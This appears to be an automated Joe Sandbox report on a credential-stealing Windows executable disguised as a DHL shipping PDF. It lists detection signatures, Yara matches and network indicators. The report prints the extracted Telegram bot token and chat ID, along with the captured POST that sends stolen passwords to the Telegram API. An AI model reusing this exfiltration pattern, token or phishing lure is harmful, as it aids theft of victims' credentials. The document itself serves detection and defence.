Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL Shipping Details Ref ID 446331798008765975594-pdf.exe

Overview

General Information

Sample name:DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
Analysis ID:1632027
MD5:de509e89b502f4ff95d4c40bdc532816
SHA1:0deb0d30f591bb0f086dba33f9724933dd108376
SHA256:8be24b4a43a08fa9f9800c60d3da03062ddb912f6a8c702d3ca58bc465788516
Tags:DHLexeuser-abuse_ch
Infos:

Detection

MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
PE file has nameless sections
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0", "Telegram Chatid": "7319393351"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
        00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0xefb7:$a1: get_encryptedPassword
          • 0xf2df:$a2: get_encryptedUsername
          • 0xed52:$a3: get_timePasswordChanged
          • 0xee73:$a4: get_passwordField
          • 0xefcd:$a5: set_encryptedPassword
          • 0x10929:$a7: get_logins
          • 0x105da:$a8: GetOutlookPasswords
          • 0x103cc:$a9: StartKeylogger
          • 0x10879:$a10: KeyLoggerEventArgs
          • 0x10429:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 19 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0xf1b7:$a1: get_encryptedPassword
                  • 0xf4df:$a2: get_encryptedUsername
                  • 0xef52:$a3: get_timePasswordChanged
                  • 0xf073:$a4: get_passwordField
                  • 0xf1cd:$a5: set_encryptedPassword
                  • 0x10b29:$a7: get_logins
                  • 0x107da:$a8: GetOutlookPasswords
                  • 0x105cc:$a9: StartKeylogger
                  • 0x10a79:$a10: KeyLoggerEventArgs
                  • 0x10629:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 25 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-07T18:41:26.645424+010020577441Malware Command and Control Activity Detected192.168.2.1049688149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-07T18:41:13.861289+010028032742Potentially Bad Traffic192.168.2.1049684132.226.247.7380TCP
                  2025-03-07T18:41:23.033169+010028032742Potentially Bad Traffic192.168.2.1049684132.226.247.7380TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-07T18:41:25.644491+010018100081Potentially Bad Traffic192.168.2.1049688149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0", "Telegram Chatid": "7319393351"}
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.6984.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendMessage"}
                  Multi AV Scanner detection for submitted file
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeReversingLabs: Detection: 52%
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeVirustotal: Detection: 62%Perma Link
                  Joe Sandbox ML detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49685 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49688 version: TLS 1.2
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_02DB1A98
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_02DB19B1
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_0A69CA7C
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_0A69EF6A
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then xor edx, edx0_2_0A69F360
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then xor edx, edx0_2_0A69F354
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 01045782h2_2_01045363
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 010451B9h2_2_01044F08
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 01045782h2_2_010456AF
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 06551935h2_2_065515F8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655F8D8h2_2_0655F630
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655A970h2_2_0655A6C8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655D93Ah2_2_0655D690
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 065531F0h2_2_06552F48
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655B220h2_2_0655AF78
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 06553AA0h2_2_065537F8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 06553EF8h2_2_06553C50
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655DEC8h2_2_0655DC20
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655E778h2_2_0655E4D0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 06550741h2_2_06550498
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655BF28h2_2_0655BC80
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655A0C0h2_2_06559CA0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 06550FF1h2_2_06550D48
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655C7D8h2_2_0655C530
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655D088h2_2_0655CDE0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655F028h2_2_0655ED80
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655A518h2_2_0655A270
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655D4E0h2_2_0655D238
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 06552D98h2_2_06552AF0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655FD30h2_2_0655FA88
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655ADC8h2_2_0655AB20
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655B678h2_2_0655B3D0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 06553648h2_2_065533A0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 065502E9h2_2_06550040
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655E320h2_2_0655E078
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655BAD0h2_2_0655B828
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655C380h2_2_0655C0D8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 06550B99h2_2_065508F0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 06554350h2_2_065540A8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655EBD0h2_2_0655E928
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655F480h2_2_0655F1D8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 0655CC30h2_2_0655C988
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 4x nop then jmp 06551449h2_2_065511A0

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49688 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.10:49688 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendDocument?chat_id=7319393351&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd5d755d711b1cHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                  Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                  Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49684 -> 132.226.247.73:80
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.10:49685 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: unknownHTTP traffic detected: POST /bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendDocument?chat_id=7319393351&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd5d755d711b1cHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeString found in binary or memory: http://ocsp.comodoca.com0
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002DEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1106846219.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1106846219.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/CRUDDataSet.xsd
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1106846219.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/CRUDDataSet1.xsd
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1106846219.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/CRUDDataSet1.xsd?0ZM
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1106846219.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/CRUDDataSet1.xsdIData
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002E74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7303504110:AAFrHdCZZNIjaxiLly7_Fjy5Tv_jE3zFKA0/sendDocument?chat_id=7319
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002DCF000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3537228103.0000000002DCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49688 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, UltraSpeed.cs.Net Code: VKCodeToUnicode

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6876, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6984, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  PE file contains section with special chars
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: section name: AGB[a"h3
                  PE file has nameless sections
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: section name:
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DBA7D40_2_02DBA7D4
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB3A880_2_02DB3A88
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB2B180_2_02DB2B18
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB48D00_2_02DB48D0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB28800_2_02DB2880
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 0_2_02DB08710_2_02DB0871
